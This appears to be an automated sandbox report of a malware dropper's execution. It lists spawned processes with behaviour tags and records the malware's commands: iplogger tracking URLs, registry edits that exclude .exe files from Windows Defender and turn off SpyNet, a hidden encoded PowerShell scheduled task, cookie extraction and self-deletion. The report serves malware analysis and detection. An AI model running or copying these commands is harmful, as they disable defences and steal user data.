699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Install.exe PID 1484 wrote to memory of 4268 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Install.exe PID 1484 wrote to memory of 4268 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Install.exe PID 2256 wrote to memory of 2540 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 2540 2256 msedge.exe msedge.exe PID 1484 wrote to memory of 444 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe KRSetp.exe PID 1484 wrote to memory of 444 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe KRSetp.exe PID 1484 wrote to memory of 4628 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Folder.exe PID 1484 wrote to memory of 4628 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Folder.exe PID 1484 wrote to memory of 4628 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Folder.exe PID 1484 wrote to memory of 4072 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe jg3_3uag.exe PID 1484 wrote to memory of 4072 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe jg3_3uag.exe PID 1484 wrote to memory of 4072 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe jg3_3uag.exe PID 1484 wrote to memory of 2400 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Installation.exe PID 1484 wrote to memory of 2400 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Installation.exe PID 1484 wrote to memory of 2400 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Installation.exe PID 1484 wrote to memory of 1684 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe pub2.exe PID 1484 wrote to memory of 1684 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe pub2.exe PID 1484 wrote to memory of 1684 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe pub2.exe PID 1484 wrote to memory of 4776 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Info.exe PID 1484 wrote to memory of 4776 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Info.exe PID 1484 wrote to memory of 4776 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe Info.exe PID 1484 wrote to memory of 4308 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe pzyh.exe PID 1484 wrote to memory of 4308 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe pzyh.exe PID 1484 wrote to memory of 4308 1484 699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe pzyh.exe PID 4628 wrote to memory of 3396 4628 Folder.exe Folder.exe PID 4628 wrote to memory of 3396 4628 Folder.exe Folder.exe PID 4628 wrote to memory of 3396 4628 Folder.exe Folder.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe PID 2256 wrote to memory of 4160 2256 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe"C:\Users\Admin\AppData\Local\Temp\699728f00e6920c375ff6e0653c1f0094198d170e45574f4930eb9033940cea6.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Files.exe"C:\Users\Admin\AppData\Local\Temp\Files.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji73⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7ffe8b0d46f8,0x7ffe8b0d4708,0x7ffe8b0d47184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1wNij72⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe8b0d46f8,0x7ffe8b0d4708,0x7ffe8b0d47183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4804 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5456 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7ef4c5460,0x7ff7ef4c5470,0x7ff7ef4c54804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5520 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16894594652709184311,3638318692695485348,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4644 /prefetch:23⤵
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Folder.exe"C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Installation.exe"C:\Users\Admin\AppData\Local\Temp\Installation.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\Info.exe"C:\Users\Admin\AppData\Local\Temp\Info.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\fHSnWneP5Q6EoIhPpSeU5djN.exe"C:\Users\Admin\Documents\fHSnWneP5Q6EoIhPpSeU5djN.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im fHSnWneP5Q6EoIhPpSeU5djN.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\fHSnWneP5Q6EoIhPpSeU5djN.exe" & del C:\ProgramData\*.dll & exit4⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im fHSnWneP5Q6EoIhPpSeU5djN.exe /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\sJhVl0NkN0zJV8udxG08WE7g.exe"C:\Users\Admin\Documents\sJhVl0NkN0zJV8udxG08WE7g.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\wu1bLlMbnJY1fSGdGO5pnIe7.exe"C:\Users\Admin\Documents\wu1bLlMbnJY1fSGdGO5pnIe7.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 6324⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 6404⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 6244⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 8084⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 11684⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 11764⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 12924⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "wu1bLlMbnJY1fSGdGO5pnIe7.exe" /f & erase "C:\Users\Admin\Documents\wu1bLlMbnJY1fSGdGO5pnIe7.exe" & exit4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "wu1bLlMbnJY1fSGdGO5pnIe7.exe" /f5⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3372 -s 14724⤵
- Program crash
-
C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe"C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe"3⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\Cd9sx7e1hcpQNdlgHi0TDACn.exe4⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 05⤵
-
C:\Users\Admin\Documents\VqpRmeW35ZNTRZEr_XdyQtZF.exe"C:\Users\Admin\Documents\VqpRmeW35ZNTRZEr_XdyQtZF.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 4724⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 4804⤵
- Program crash
-
C:\Users\Admin\Documents\lWIxRZFsQrh1cFnOUnJtWK7Z.exe"C:\Users\Admin\Documents\lWIxRZFsQrh1cFnOUnJtWK7Z.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\Users\Admin\Documents\YK5kC4ak2RRcQ9kSdeWgayqF.exe"C:\Users\Admin\Documents\YK5kC4ak2RRcQ9kSdeWgayqF.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe4⤵
-
C:\Users\Admin\Documents\hg6o6ShsofU_l9G5bh1ptRCJ.exe"C:\Users\Admin\Documents\hg6o6ShsofU_l9G5bh1ptRCJ.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\Vkqg65q1o6YbJlG1k8WTpH4b.exe"C:\Users\Admin\Documents\Vkqg65q1o6YbJlG1k8WTpH4b.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\kfIx4AeXaIwJT4gAZvt28Hop.exe"C:\Users\Admin\Documents\kfIx4AeXaIwJT4gAZvt28Hop.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\f2lCpeMBm5aZjIxJZYyknrN9.exe"C:\Users\Admin\Documents\f2lCpeMBm5aZjIxJZYyknrN9.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe"C:\Users\Admin\Documents\JyIHoBk_ZcAJMkpXEDxdKejd.exe"3⤵
-
C:\Users\Admin\Documents\dzAnISXyBAB9TJgfQpiJNqgn.exe"C:\Users\Admin\Documents\dzAnISXyBAB9TJgfQpiJNqgn.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\_0y86lmH_Y5w2jgAjGURyIoy.exe"C:\Users\Admin\Documents\_0y86lmH_Y5w2jgAjGURyIoy.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\ZJdaWucTUPWvvHp7cyQhgO6f.exe"C:\Users\Admin\Documents\ZJdaWucTUPWvvHp7cyQhgO6f.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\3um2ASQgdHK5qhmvaTd2nHR7.exe"C:\Users\Admin\Documents\3um2ASQgdHK5qhmvaTd2nHR7.exe"3⤵
-
C:\Users\Admin\Documents\ZLQHmcinqrtmxG29JeWHldZs.exe"C:\Users\Admin\Documents\ZLQHmcinqrtmxG29JeWHldZs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\pzyh.exe"C:\Users\Admin\AppData\Local\Temp\pzyh.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 6083⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 3808 -ip 38081⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 3372 -ip 33721⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5212 -ip 52121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 4601⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5212 -ip 52121⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS385E.tmp\Install.exe.\Install.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS482D.tmp\Install.exe.\Install.exe /S /site_id "525403"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&4⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:325⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&4⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:325⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gNolbFUQj" /SC once /ST 02:39:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gNolbFUQj"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gNolbFUQj"3⤵
-
